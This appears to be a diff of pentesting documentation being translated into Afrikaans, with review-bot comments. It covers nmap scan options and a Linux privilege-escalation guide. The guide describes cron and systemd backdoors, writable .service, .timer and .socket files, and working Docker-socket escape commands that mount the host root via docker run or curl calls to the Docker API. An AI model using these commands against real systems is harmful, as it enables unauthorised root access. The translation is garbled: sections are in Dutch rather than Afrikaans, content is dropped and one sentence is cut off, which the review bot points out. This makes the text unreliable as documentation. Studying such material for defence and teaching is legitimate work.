Dit is gebaseer op die feit dat standaard voldoenende masjiene met RST op alle versoek wat nie SYN, RST of ACK vlae het nie moet antwoord: oop/gefiltreer(niks), gesluit(RST), gefiltreer (ICMP onbereikbaar). Onbetroubaar op Windows, CIsco, BSDI en OS/400. Op Unix wel. +* **`-sM`**: Maimon skandering: Stuur FIN- en ACK-vlae, gebruik vir BSD, tans sal dit alles as gesluit terugkeer. +* **`-sA, sW`**: ACK en Window, word gebruik om vuurmuure op te spoor, om te weet of die poorte gefiltreer word of nie. Die -sW onderskei tussen oop/gesluit aangesien die oop een met 'n ander vensterwaarde antwoord: oop (RST met venster anders as 0), gesluit (RST-venster = 0), gefiltreer (ICMP onbereikbaar of niks). Nie alle rekenaars werk op hierdie manier nie, so as dit alles gesluit is, werk dit nie, as dit 'n paar oop is, werk dit goed, en as dit baie oop en min gesluit is, werk dit die ander kant toe. +* **`-sI`:** Idle skandering. Vir gevalle waar daar 'n aktiewe vuurmuur is, maar ons weet dat dit nie na 'n sekere IP filter nie (of wanneer ons eenvoudig anonimiteit wil hê), kan ons die zombie skanderingsinstrument gebruik (dit werk vir alle poorte), om moontlike zombies te soek, kan ons die ipidseq skrip of die exploit auxiliary/scanner/ip/ipidseq gebruik. Hierdie skanderingsinstrument is gebaseer op die IPID-nommer van die IP-pakkies. +* **`--badsum`:** Dit stuur die som verkeerd, die rekenaars sal die pakkies verwerp, maar die vuurmuure kan iets antwoord, dit word gebruik om vuurmuure op te spoor. +* **`-sZ`:** "Vreemde" SCTP-skanderingsinstrument, wanneer sondes met koekie-echo-fragmente gestuur word, moet dit laat val word as dit oop is of met ABORT geantwoord word as dit gesluit is. Dit kan deur vuurmuure gaan waardeur init nie kan gaan nie +**--osscan-guess** Wanneer OS-detectie niet perfect is, zorgt dit ervoor dat er meer inspanning wordt geleverd. **Scripts** \--script _\_|_\_|_\_|_\_\[,...] 
-Para usar los de por efecto vale con -sC o --script=default +Om de standaardscripts te gebruiken, volstaat het om -sC of --script=default te gebruiken. -Los tipos que hay son de: auth, broadcast, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, and vuln +De beschikbare categorieën zijn: auth, broadcast, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version en vuln. -* **Auth:** ejecuta todos sus _scripts_ disponibles para autenticación -* **Default:** ejecuta los _scripts_ básicos por defecto de la herramienta -* **Discovery:** recupera información del _target_ o víctima -* **External:** _script_ para utilizar recursos externos -* **Intrusive:** utiliza _scripts_ que son considerados intrusivos para la víctima o _target_ -* **Malware:** revisa si hay conexiones abiertas por códigos maliciosos o _backdoors_ (puertas traseras) -* **Safe:** ejecuta _scripts_ que no son intrusivos -* **Vuln:** descubre las vulnerabilidades más conocidas -* **All:** ejecuta absolutamente todos los _scripts_ con extensión NSE disponibles +* **Auth:** voert alle beschikbare scripts uit voor authenticatie. +* **Default:** voert de standaard basis scripts van de tool uit. +* **Discovery:** haalt informatie op van het doelwit of slachtoffer. +* **External:** script om externe bronnen te gebruiken. +* **Intrusive:** gebruikt scripts die als indringend worden beschouwd voor het doelwit of slachtoffer. +* **Malware:** controleert of er open verbindingen zijn door kwaadaardige code of achterdeuren. +* **Safe:** voert scripts uit die niet indringend zijn. +* **Vuln:** ontdekt de meest bekende kwetsbaarheden. +* **All:** voert alle beschikbare NSE-scripts uit. 
-Para buscar scripts: +Om scripts te zoeken: -**nmap --script-help="http-\*" -> Los que empiecen por http-** +**nmap --script-help="http-\*" -> Die wat met http- begin** -**nmap --script-help="not intrusive" -> Todos menos esos** +**nmap --script-help="not intrusive" -> Alles behalwe dit** -**nmap --script-help="default or safe" -> Los que estan en uno o en otro o en ambos** +**nmap --script-help="default or safe" -> Die in een van beide of beide categorieën vallen** -**nmap --script-help="default and safe" --> Los que estan en ambos** +**nmap --script-help="default and safe" --> Die in beide categorieën vallen** **nmap --script-help="(default or safe or intrusive) and not http-\*"** 
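Review bot: The first nmap-summary-esp.md hunk drops content instead of translating it: the `-sZ` item stops mid-sentence at `waardeur init nie kan gaan nie` (the original continues with the caveat that it cannot distinguish filtered from open), the `-sO` and `-b <server>` entries and the whole `Centrar análisis` block (`-p`, `-F`, `--top-ports`, `-r`, `--port-ratio`, `-sV`, `--version-intensity`, `-O`, `--osscan-limit`) have no `+` counterpart, and only `--osscan-guess` survives, which is consistent with the shrinking hunk size (`-1,104 +1,87`). Those lines should be carried over before merging. Separately, the surviving `--osscan-guess` line and the entire Scripts block (`Om de standaardscripts te gebruiken, volstaat het`, `voert alle beschikbare scripts uit`, `Om scripts te zoeken`) are Dutch, not Afrikaans, while the top of the same file is Afrikaans; redo that block in Afrikaans to match the commit subject.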
@@ -108,43 +91,43 @@ Para buscar scripts: \--script-help _\_|_\_|_\_|_\_|all\[,...] -\--script-trace ---> Da info de como va elscript +\--script-trace ---> Geeft informatie over de voortgang van het script. \--script-updatedb -**Para usar un script solo hay que poner: namp --script Nombre\_del\_script objetivo** --> Al poner el script se ejecutará tanto el script como el escaner, asi que tambien se pueden poner opciones del escaner, podemos añadir **“safe=1”** para que se ejecuten solo los que sean seguros. +Om een script te gebruiken, hoef je alleen maar het volgende in te voeren: nmap --script Naam\_van\_script doelwit --> Door het script op te geven, wordt zowel het script als de scanner uitgevoerd. Je kunt ook scanneropties toevoegen, zoals "safe=1", zodat alleen veilige scripts worden uitgevoerd. -**Control tiempo** +**Tijdbeheer** -**Nmap puede modificar el tiempo en segundos, minutos, ms:** --host-timeout arguments 900000ms, 900, 900s, and 15m all do the same thing. +**Nmap kan de tijd in seconden, minuten, ms aanpassen:** --host-timeout arguments 900000ms, 900, 900s en 15m doen allemaal hetzelfde. -Nmap divide el numero total de host a escanear en grupos y analiza esos grupos en bloques de forma que hasta que no han sido analizados todos, no pasa al siguiente bloque (y el usuario tampoco recibe ninguna actualización hasta que se haya analizado el bloque) de esta forma, es más óptimo para nmap usar grupos grandes. Por defecto en clase C usa 256. +Nmap verdeelt het totale aantal te scannen hosts in groepen en analyseert deze groepen in blokken, zodat het pas naar het volgende blok gaat nadat alle hosts zijn geanalyseerd (en de gebruiker ontvangt ook geen updates totdat het blok is geanalyseerd). Op deze manier is het voor Nmap efficiënter om grote groepen te gebruiken. Standaard gebruikt het 256 voor klasse C. 
-Se puede cambiar con\*\*--min-hostgroup\*\* _**\**_**;** **--max-hostgroup** _**\**_ (Adjust parallel scan group sizes) +Dit kan worden gewijzigd met **--min-hostgroup** _**\**_**;** **--max-hostgroup** _**\**_ (Pas de grootte van parallelle scantaken aan) -Se puede controlar el numero de escaners en paralelo pero es mejor que no (nmpa ya incorpora control automatico en base al estado de la red): **--min-parallelism** _**\**_**;** **--max-parallelism** _**\**_ +Het aantal parallelle scanners kan worden gecontroleerd, maar het is beter om dit niet te doen (Nmap heeft al automatische controle op basis van de netwerkstatus): **--min-parallelism** _**\**_**;** **--max-parallelism** _**\**_ -Podemos modificar el rtt timeout, pero no suele ser necesario: **--min-rtt-timeout** _**\
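Review bot: The second nmap-summary-esp.md hunk (`@@ -108,43 +91,43 @@`) is again Dutch rather than Afrikaans (`Geeft informatie over de voortgang van het script`, `Tijdbeheer`, `Nmap verdeelt het totale aantal te scannen hosts`), inconsistent with the Afrikaans used earlier in the same file and with the commit subject "Translated to Afrikaans". The line `Om een script te gebruiken ... nmap --script Naam\_van\_script doelwit` also loses the bold markup the original placed on the command, and `--host-timeout arguments 900000ms, 900, 900s en 15m` keeps the English word `arguments` untranslated.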
#Wait until it is executed /tmp/bash -p ``` - -If the script executed by root uses a **directory where you have full access**, maybe it could be useful to delete that folder and **create a symlink folder to another one** serving a script controlled by you - +As die skripsie wat deur root uitgevoer word 'n **gids gebruik waarin jy volle toegang het**, mag dit nuttig wees om daardie gids te verwyder en 'n **symlink-gids na 'n ander gids te skep** wat 'n skrips beheer deur jou bedien. ```bash ln -d -s
``` +### Gereelde cron-werkies -### Frequent cron jobs - -You can monitor the processes to search for processes that are being executed every 1, 2 or 5 minutes. Maybe you can take advantage of it and escalate privileges. - -For example, to **monitor every 0.1s during 1 minute**, **sort by less executed commands** and delete the commands that have been executed the most, you can do: +Jy kan die prosesse monitor om te soek na prosesse wat elke 1, 2 of 5 minute uitgevoer word. Miskien kan jy daarvan gebruik maak en voorregte verhoog. +Byvoorbeeld, om **elke 0.1s vir 1 minuut te monitor**, **sorteer volgens minder uitgevoerde opdragte** en die opdragte te verwyder wat die meeste uitgevoer is, kan jy doen: ```bash for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[6-9][0-9][0-9]|\s*[0-9][0-9][0-9][0-9]"; rm /tmp/monprocs.tmp; ``` +**Jy kan ook gebruik maak van** [**pspy**](https://github.com/DominicBreuker/pspy/releases) (dit sal elke proses monitor en lys wat begin). -**You can also use** [**pspy**](https://github.com/DominicBreuker/pspy/releases) (this will monitor and list every process that starts). - -### Invisible cron jobs - -It's possible to create a cronjob **putting a carriage return after a comment** (without newline character), and the cron job will work. Example (note the carriage return char): +### Onsigbare cron-take +Dit is moontlik om 'n cron-taak te skep **deur 'n wagenretour na 'n kommentaar te plaas** (sonder 'n nuwe lyn karakter), en die cron-taak sal werk. Voorbeeld (let op die wagenretour karakter): ```bash #This is a comment inside a cron config file\r* * * * * echo "Surprise!" ``` +## Dienste -## Services +### Skryfbare _.service_ lêers -### Writable _.service_ files +Kyk of jy enige `.service` lêer kan skryf. 
As jy kan, **kan jy dit wysig** sodat dit jou **agterdeur uitvoer** wanneer die diens **begin**, **herbegin** of **gestop** word (miskien moet jy wag totdat die masjien herlaai word).\ +Byvoorbeeld, skep jou agterdeur binne die .service lêer met **`ExecStart=/tmp/script.sh`** -Check if you can write any `.service` file, if you can, you **could modify it** so it **executes** your **backdoor when** the service is **started**, **restarted** or **stopped** (maybe you will need to wait until the machine is rebooted).\ -For example create your backdoor inside the .service file with **`ExecStart=/tmp/script.sh`** +### Skryfbare diens-binêre lêers -### Writable service binaries +Hou in gedagte dat as jy **skryftoestemmings het oor binêre lêers wat deur dienste uitgevoer word**, jy hulle kan verander na agterdeure sodat wanneer die dienste heruitgevoer word, die agterdeure uitgevoer sal word. -Keep in mind that if you have **write permissions over binaries being executed by services**, you can change them for backdoors so when the services get re-executed the backdoors will be executed. - -### systemd PATH - Relative Paths - -You can see the PATH used by **systemd** with: +### systemd-PAD - Relatiewe paaie +Jy kan die PAD wat deur **systemd** gebruik word, sien met: ```bash systemctl show-environment ``` - -If you find that you can **write** in any of the folders of the path you may be able to **escalate privileges**. You need to search for **relative paths being used on service configurations** files like: - +As jy vind dat jy kan **skryf** in enige van die lêers van die pad, kan jy moontlik **voorregte verhoog**. 
Jy moet soek na **relatiewe paaie wat gebruik word in dienskonfigurasie**-lêers soos: ```bash ExecStart=faraday-server ExecStart=/bin/sh -ec 'ifup --allow=hotplug %I; ifquery --state %I' ExecStop=/bin/sh "uptux-vuln-bin3 -stuff -hello" ``` +Vervolgens skep 'n **uitvoerbare** lêer met dieselfde naam as die relatiewe pad binêre lêer binne die systemd PAD-vouer waarin jy kan skryf, en wanneer die diens gevra word om die kwesbare aksie (**Begin**, **Stop**, **Herlaai**) uit te voer, sal jou **agterdeur uitgevoer word** (ongepriviligeerde gebruikers kan gewoonlik nie dienste begin/stop nie, maar kyk of jy `sudo -l` kan gebruik). -Then, create an **executable** with the **same name as the relative path binary** inside the systemd PATH folder you can write, and when the service is asked to execute the vulnerable action (**Start**, **Stop**, **Reload**), your **backdoor will be executed** (unprivileged users usually cannot start/stop services but check if you can use `sudo -l`). +**Leer meer oor dienste met `man systemd.service`.** -**Learn more about services with `man systemd.service`.** +## **Tydskakelaars** -## **Timers** - -**Timers** are systemd unit files whose name ends in `**.timer**` that control `**.service**` files or events. **Timers** can be used as an alternative to cron as they have built-in support for calendar time events and monotonic time events and can be run asynchronously. - -You can enumerate all the timers with: +**Tydskakelaars** is systemd eenheidslêers waarvan die naam eindig op `**.timer**` wat `**.service**` lêers of gebeurtenisse beheer. **Tydskakelaars** kan gebruik word as 'n alternatief vir cron, aangesien hulle ingeboude ondersteuning vir kalender-tydgebeurtenisse en monotoniese tydgebeurtenisse het en asinkronies uitgevoer kan word. 
+Jy kan al die tydskakelaars opsom met: ```bash systemctl list-timers --all ``` +### Skryfbare timers -### Writable timers - -If you can modify a timer you can make it execute some existents of systemd.unit (like a `.service` or a `.target`) - +As jy 'n tydhouer kan wysig, kan jy dit laat uitvoer met bestaande systemd.unit (soos 'n `.service` of 'n `.target`) ```bash Unit=backdoor.service ``` +In die dokumentasie kan jy lees wat die Eenheid is: -In the documentation you can read what the Unit is: +> Die eenheid wat geaktiveer moet word wanneer hierdie tydtuig verloop. Die argument is 'n eenheidsnaam, waarvan die agtervoegsel nie ".timer" is nie. As dit nie gespesifiseer word nie, is hierdie waarde verstek 'n diens wat dieselfde naam as die tydtuig-eenheid het, behalwe vir die agtervoegsel. (Sien hierbo.) Dit word aanbeveel dat die geaktiveerde eenheidsnaam en die eenheidsnaam van die tydtuig-eenheid identies genoem word, behalwe vir die agtervoegsel. -> The unit to activate when this timer elapses. The argument is a unit name, whose suffix is not ".timer". If not specified, this value defaults to a service that has the same name as the timer unit, except for the suffix. (See above.) It is recommended that the unit name that is activated and the unit name of the timer unit are named identically, except for the suffix. 
+Daarom sal jy hierdie toestemming moet misbruik deur: -Therefore, to abuse this permission you would need to: +* Vind 'n systemd-eenheid (soos 'n `.service`) wat 'n **skryfbare binêre lêer uitvoer** +* Vind 'n systemd-eenheid wat 'n **relatiewe pad uitvoer** en jy het **skryfregte** oor die **systemd-PAD** (om daardie uitvoerbare lêer na te boots) -* Find some systemd unit (like a `.service`) that is **executing a writable binary** -* Find some systemd unit that is **executing a relative path** and you have **writable privileges** over the **systemd PATH** (to impersonate that executable) +**Leer meer oor tydtuie met `man systemd.timer`.** -**Learn more about timers with `man systemd.timer`.** - -### **Enabling Timer** - -To enable a timer you need root privileges and to execute: +### **Tydtuig aktiveer** +Om 'n tydtuig te aktiveer, benodig jy root-regte en voer die volgende uit: ```bash sudo systemctl enable backu2.timer Created symlink /etc/systemd/system/multi-user.target.wants/backu2.timer → /lib/systemd/system/backu2.timer. ``` - -Note the **timer** is **activated** by creating a symlink to it on `/etc/systemd/system/.wants/.timer` +Let daarop dat die **tydhouer** geaktiveer word deur 'n simboliese skakel daarvan te skep op `/etc/systemd/system/.wants/.timer` ## Sockets -Unix Domain Sockets (UDS) enable **process communication** on the same or different machines within client-server models. They utilize standard Unix descriptor files for inter-computer communication and are set up through `.socket` files. +Unix Domain Sockets (UDS) maak **proseskommunikasie** moontlik op dieselfde of verskillende rekenaars binne klient-bedienermodelle. Hulle maak gebruik van standaard Unix-beskrywerlêers vir inter-rekenaarkommunikasie en word opgestel deur middel van `.socket`-lêers. -Sockets can be configured using `.socket` files. +Sockets kan gekonfigureer word met behulp van `.socket`-lêers. 
-**Learn more about sockets with `man systemd.socket`.** Inside this file, several interesting parameters can be configured: +**Leer meer oor sockets met `man systemd.socket`.** Binne hierdie lêer kan verskeie interessante parameters gekonfigureer word: -* `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: These options are different but a summary is used to **indicate where it is going to listen** to the socket (the path of the AF\_UNIX socket file, the IPv4/6 and/or port number to listen, etc.) -* `Accept`: Takes a boolean argument. If **true**, a **service instance is spawned for each incoming connection** and only the connection socket is passed to it. If **false**, all listening sockets themselves are **passed to the started service unit**, and only one service unit is spawned for all connections. This value is ignored for datagram sockets and FIFOs where a single service unit unconditionally handles all incoming traffic. **Defaults to false**. For performance reasons, it is recommended to write new daemons only in a way that is suitable for `Accept=no`. -* `ExecStartPre`, `ExecStartPost`: Takes one or more command lines, which are **executed before** or **after** the listening **sockets**/FIFOs are **created** and bound, respectively. The first token of the command line must be an absolute filename, then followed by arguments for the process. -* `ExecStopPre`, `ExecStopPost`: Additional **commands** that are **executed before** or **after** the listening **sockets**/FIFOs are **closed** and removed, respectively. -* `Service`: Specifies the **service** unit name **to activate** on **incoming traffic**. This setting is only allowed for sockets with Accept=no. It defaults to the service that bears the same name as the socket (with the suffix replaced). In most cases, it should not be necessary to use this option. 
+* `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: Hierdie opsies is verskillend, maar 'n opsomming word gebruik om aan te dui **waar dit gaan luister** na die socket (die pad van die AF\_UNIX socket-lêer, die IPv4/6 en/of poortnommer om na te luister, ens.) +* `Accept`: Neem 'n booleaanse argument. As dit **waar** is, word 'n **diensinstansie gegenereer vir elke inkomende verbinding** en word slegs die verbindingssocket daaraan oorgedra. As dit **onwaar** is, word al die luisterende sockets self **oorgedra aan die gestarte dienseenheid**, en slegs een dienseenheid word gegenereer vir alle verbindinge. Hierdie waarde word geïgnoreer vir datagramsockets en FIFO's waar 'n enkele dienseenheid onvoorwaardelik al die inkomende verkeer hanteer. **Standaard onwaar**. Vir prestasie-redes word dit aanbeveel om nuwe daemons slegs op 'n manier te skryf wat geskik is vir `Accept=no`. +* `ExecStartPre`, `ExecStartPost`: Neem een of meer opdraglyne, wat uitgevoer word **voor** of **na** die skep en bind van die luisterende **sockets**/FIFO's. Die eerste token van die opdraglyn moet 'n absolute lêernaam wees, gevolg deur argumente vir die proses. +* `ExecStopPre`, `ExecStopPost`: Addisionele **opdragte** wat **voor** of **na** die sluit en verwyder van die luisterende **sockets**/FIFO's uitgevoer word. +* `Service`: Spesifiseer die **diens**eenheidsnaam **om te aktiveer** met **inkomende verkeer**. Hierdie instelling is slegs toegelaat vir sockets met Accept=no. Dit is standaard die diens wat dieselfde naam as die socket dra (met die agtervoegsel vervang). In die meeste gevalle behoort dit nie nodig te wees om hierdie opsie te gebruik nie. 
-### Writable .socket files +### Skryfbare .socket-lêers -If you find a **writable** `.socket` file you can **add** at the beginning of the `[Socket]` section something like: `ExecStartPre=/home/kali/sys/backdoor` and the backdoor will be executed before the socket is created. Therefore, you will **probably need to wait until the machine is rebooted.**\ -_Note that the system must be using that socket file configuration or the backdoor won't be executed_ +As jy 'n **skryfbare** `.socket`-lêer vind, kan jy aan die begin van die `[Socket]`-afdeling iets soos `ExecStartPre=/home/kali/sys/backdoor` byvoeg en die agterdeur sal uitgevoer word voordat die socket geskep word. Jy sal dus **waarskynlik moet wag totdat die masjien herlaai word.**\ +Merk op dat die stelsel daardie socketlêerkonfigurasie moet gebruik of die agterdeur sal nie uitgevoer word nie. -### Writable sockets +### Skryfbare sockets -If you **identify any writable socket** (_now we are talking about Unix Sockets and not about the config `.socket` files_), then **you can communicate** with that socket and maybe exploit a vulnerability. - -### Enumerate Unix Sockets +As jy enige **skryfbare socket** identifiseer (_nou praat ons van Unix Sockets en nie van die konfigurasie `.socket`-lêers nie_), kan jy met daardie socket **kommunikeer** en dalk 'n kwesbaarheid uitbuit. +### Enumereer Unix Sockets ```bash netstat -a -p --unix ``` +### Rou verbinding -### Raw connection +Om een ​​ruwe verbinding tot stand te brengen met een doelhost, kunt u de `nc` (netcat) opdracht gebruiken. Deze opdracht stelt u in staat om TCP- of UDP-verbindingen te maken en te beheren. 
+Om een ​​TCP-verbinding te maken met een doelhost op een specifieke poort, gebruikt u het volgende commando: + +```bash +nc +``` + +Bijvoorbeeld: + +```bash +nc 192.168.0.10 8080 +``` + +Om een ​​UDP-verbinding te maken, voegt u de `-u` vlag toe aan het commando: + +```bash +nc -u +``` + +Bijvoorbeeld: + +```bash +nc -u 192.168.0.10 1234 +``` + +Zodra de verbinding tot stand is gebracht, kunt u gegevens verzenden en ontvangen via de terminal. ```bash #apt-get install netcat-openbsd nc -U /tmp/socket #Connect to UNIX-domain stream socket 
@@ -577,96 +618,91 @@ nc -uU /tmp/socket #Connect to UNIX-domain datagram socket #apt-get install socat socat - UNIX-CLIENT:/dev/socket #connect to UNIX-domain socket, irrespective of its type ``` - -**Exploitation example:** +**Exploitasie-voorbeeld:** {% content-ref url="socket-command-injection.md" %} [socket-command-injection.md](socket-command-injection.md) {% endcontent-ref %} -### HTTP sockets - -Note that there may be some **sockets listening for HTTP** requests (_I'm not talking about .socket files but the files acting as unix sockets_). You can check this with: +### HTTP-aansluitings +Let daarop dat daar moontlik **aansluitings is wat wag vir HTTP-aanvrae** (_Ek praat nie van .socket-lêers nie, maar van die lêers wat as Unix-aansluitings optree_). Jy kan dit nagaan met: ```bash curl --max-time 2 --unix-socket /pat/to/socket/files http:/index ``` +As die sokket **reageer met 'n HTTP** versoek, kan jy daarmee **kommunikeer** en dalk **van 'n kwesbaarheid gebruik maak**. -If the socket **responds with an HTTP** request, then you can **communicate** with it and maybe **exploit some vulnerability**. +### Skryfbare Docker Sokket -### Writable Docker Socket +Die Docker sokket, wat dikwels gevind word by `/var/run/docker.sock`, is 'n kritieke lêer wat beveilig moet word. Standaard is dit skryfbaar deur die `root` gebruiker en lede van die `docker` groep. As jy skryftoegang tot hierdie sokket het, kan dit lei tot bevoorregte eskalasie. Hier is 'n uiteensetting van hoe dit gedoen kan word en alternatiewe metodes as die Docker CLI nie beskikbaar is nie. -The Docker socket, often found at `/var/run/docker.sock`, is a critical file that should be secured. By default, it's writable by the `root` user and members of the `docker` group. Possessing write access to this socket can lead to privilege escalation. Here's a breakdown of how this can be done and alternative methods if the Docker CLI isn't available. 
- -#### **Privilege Escalation with Docker CLI** - -If you have write access to the Docker socket, you can escalate privileges using the following commands: +#### **Bevoorregte Eskalasie met Docker CLI** +As jy skryftoegang tot die Docker sokket het, kan jy bevoorregte eskalasie bewerkstellig deur die volgende opdragte te gebruik: ```bash docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh ``` +Hierdie opdragte stel jou in staat om 'n houer uit te voer met toegang op roetvlak tot die gasheer se lêersisteem. -These commands allow you to run a container with root-level access to the host's file system. +#### **Deur die Docker API Direk** -#### **Using Docker API Directly** +In gevalle waar die Docker CLI nie beskikbaar is nie, kan die Docker sokket steeds gemanipuleer word deur die Docker API en `curl` opdragte. -In cases where the Docker CLI isn't available, the Docker socket can still be manipulated using the Docker API and `curl` commands. +1. **Lys Docker-beelde:** +Haal die lys beskikbare beelde op. -1. **List Docker Images:** - Retrieve the list of available images. +```bash +curl -XGET --unix-socket /var/run/docker.sock http://localhost/images/json +``` - ```bash - curl -XGET --unix-socket /var/run/docker.sock http://localhost/images/json - ``` +2. **Skep 'n Houer:** +Stuur 'n versoek om 'n houer te skep wat die gasheer se roetgids monteer. -2. **Create a Container:** - Send a request to create a container that mounts the host system's root directory. 
+```bash +curl -XPOST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock -d '{"Image":"","Cmd":["/bin/sh"],"DetachKeys":"Ctrl-p,Ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/","Target":"/host_root"}]}' http://localhost/containers/create +``` - ```bash - curl -XPOST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock -d '{"Image":"","Cmd":["/bin/sh"],"DetachKeys":"Ctrl-p,Ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/","Target":"/host_root"}]}' http://localhost/containers/create - ``` +Begin die nuutgeskepte houer: - Start the newly created container: +```bash +curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers//start +``` - ```bash - curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers//start - ``` +3. **Koppel aan die Houer:** +Gebruik `socat` om 'n verbinding met die houer tot stand te bring, wat opdraguitvoering binne-in die houer moontlik maak. -3. **Attach to the Container:** - Use `socat` to establish a connection to the container, enabling command execution within it. +```bash +socat - UNIX-CONNECT:/var/run/docker.sock +POST /containers//attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1 +Host: +Connection: Upgrade +Upgrade: tcp +``` - ```bash - socat - UNIX-CONNECT:/var/run/docker.sock - POST /containers//attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1 - Host: - Connection: Upgrade - Upgrade: tcp - ``` +Nadat die `socat`-verbinding opgestel is, kan jy opdragte direk in die houer uitvoer met toegang op roetvlak tot die gasheer se lêersisteem. -After setting up the `socat` connection, you can execute commands directly in the container with root-level access to the host's filesystem. +### Ander -### Others +Let daarop dat as jy skryftoestemmings oor die Docker sokket het omdat jy **binne die groep `docker`** is, het jy [**meer maniere om voorregte te verhoog**](interesting-groups-linux-pe/#docker-group). 
As die [**docker API na 'n poort luister** kan jy dit ook moontlik kompromitteer](../../network-services-pentesting/2375-pentesting-docker.md#compromising). -Note that if you have write permissions over the docker socket because you are **inside the group `docker`** you have [**more ways to escalate privileges**](interesting-groups-linux-pe/#docker-group). If the [**docker API is listening in a port** you can also be able to compromise it](../../network-services-pentesting/2375-pentesting-docker.md#compromising). - -Check **more ways to break out from docker or abuse it to escalate privileges** in: +Kyk na **meer maniere om uit te breek uit Docker of dit te misbruik om voorregte te verhoog** in: {% content-ref url="docker-security/" %} [docker-security](docker-security/) {% endcontent-ref %} -## Containerd (ctr) privilege escalation +## Containerd (ctr) voorregverhoging -If you find that you can use the **`ctr`** command read the following page as **you may be able to abuse it to escalate privileges**: +As jy vind dat jy die **`ctr`**-opdrag kan gebruik, lees dan die volgende bladsy aangesien **jy dit moontlik kan misbruik om voorregte te verhoog**: {% content-ref url="containerd-ctr-privilege-escalation.md" %} [containerd-ctr-privilege-escalation.md](containerd-ctr-privilege-escalation.md) {% endcontent-ref %} -## **RunC** privilege escalation +## **RunC** voorregverhoging -If you find that you can use the **`runc`** command read the following page as **you may be able to abuse it to escalate privileges**: +As jy vind dat jy die **`runc`**-opdrag kan gebruik, lees dan die volgende bladsy aangesien **jy dit moontlik kan misbruik om voorregte te verhoog**: {% content-ref url="runc-privilege-escalation.md" %} [runc-privilege-escalation.md](runc-privilege-escalation.md) 
@@ -674,37 +710,34 @@ If you find that you can use the **`runc`** command read the following page as * ## **D-Bus** -D-Bus is a sophisticated **inter-Process Communication (IPC) system** that enables applications to efficiently interact and share data. Designed with the modern Linux system in mind, it offers a robust framework for different forms of application communication. +D-Bus is 'n gesofistikeerde **interproseskommunikasie (IPC)-sisteem** wat toepassings in staat stel om doeltreffend met mekaar te kommunikeer en data te deel. Dit is ontwerp met die moderne Linux-sisteem in gedagte en bied 'n robuuste raamwerk vir verskillende vorme van toepassingskommunikasie. -The system is versatile, supporting basic IPC that enhances data exchange between processes, reminiscent of **enhanced UNIX domain sockets**. Moreover, it aids in broadcasting events or signals, fostering seamless integration among system components. For instance, a signal from a Bluetooth daemon about an incoming call can prompt a music player to mute, enhancing user experience. Additionally, D-Bus supports a remote object system, simplifying service requests and method invocations between applications, streamlining processes that were traditionally complex. +Die stelsel is veelsydig en ondersteun basiese IPC wat data-uitruiling tussen prosesse verbeter, soortgelyk aan **verbeterde UNIX-domeinsokkets**. Dit help ook om gebeure of seine uit te saai, wat naadlose integrasie tussen stelselkomponente bevorder. Byvoorbeeld, 'n sein van 'n Bluetooth-daemon oor 'n inkomende oproep kan 'n musiekspeler laat demp, wat die gebruikerservaring verbeter. Daarbenewens ondersteun D-Bus 'n afgeleë objeksisteem wat diensversoeke en metode-aanroepings tussen toepassings vereenvoudig, wat prosesse wat tradisioneel ingewikkeld was, stroomlyn. -D-Bus operates on an **allow/deny model**, managing message permissions (method calls, signal emissions, etc.) based on the cumulative effect of matching policy rules. 
These policies specify interactions with the bus, potentially allowing for privilege escalation through the exploitation of these permissions. +D-Bus werk volgens 'n **toelaat/weier-model** en bestuur boodskaptoestemmings (metode-oproepe, seinuitsette, ens.) gebaseer op die kumulatiewe effek van ooreenstemmende beleidsreëls. Hierdie beleide spesifiseer interaksies met die bus en kan moontlik voorregverhoging moontlik maak deur die uitbuiting van hierdie toestemmings. -An example of such a policy in `/etc/dbus-1/system.d/wpa_supplicant.conf` is provided, detailing permissions for the root user to own, send to, and receive messages from `fi.w1.wpa_supplicant1`. - -Policies without a specified user or group apply universally, while "default" context policies apply to all not covered by other specific policies. +'n Voorbeeld van so 'n beleid in `/etc/dbus-1/system.d/wpa_supplicant.conf` word verskaf, wat toestemmings vir die root-gebruiker beskryf om boodskappe aan `fi.w1.wpa_supplicant1` te besit, te stuur en te ontvang. +Beleide sonder 'n gespesifiseerde gebruiker of groep is universeel van toepassing, terwyl "standaard" konteksbeleide van toepassing is op almal wat nie deur ander spesifieke beleide gedek word nie. ```xml - - - - + + + + ``` - -**Learn how to enumerate and exploit a D-Bus communication here:** +**Leer hoe om 'n D-Bus kommunikasie te ondersoek en uit te buit hier:** {% content-ref url="d-bus-enumeration-and-command-injection-privilege-escalation.md" %} [d-bus-enumeration-and-command-injection-privilege-escalation.md](d-bus-enumeration-and-command-injection-privilege-escalation.md) {% endcontent-ref %} -## **Network** +## **Netwerk** -It's always interesting to enumerate the network and figure out the position of the machine. - -### Generic enumeration +Dit is altyd interessant om die netwerk te ondersoek en die posisie van die masjien te bepaal. +### Generiese ondersoek ```bash #Hostname, hosts and DNS cat /etc/hostname /etc/hosts /etc/resolv.conf 
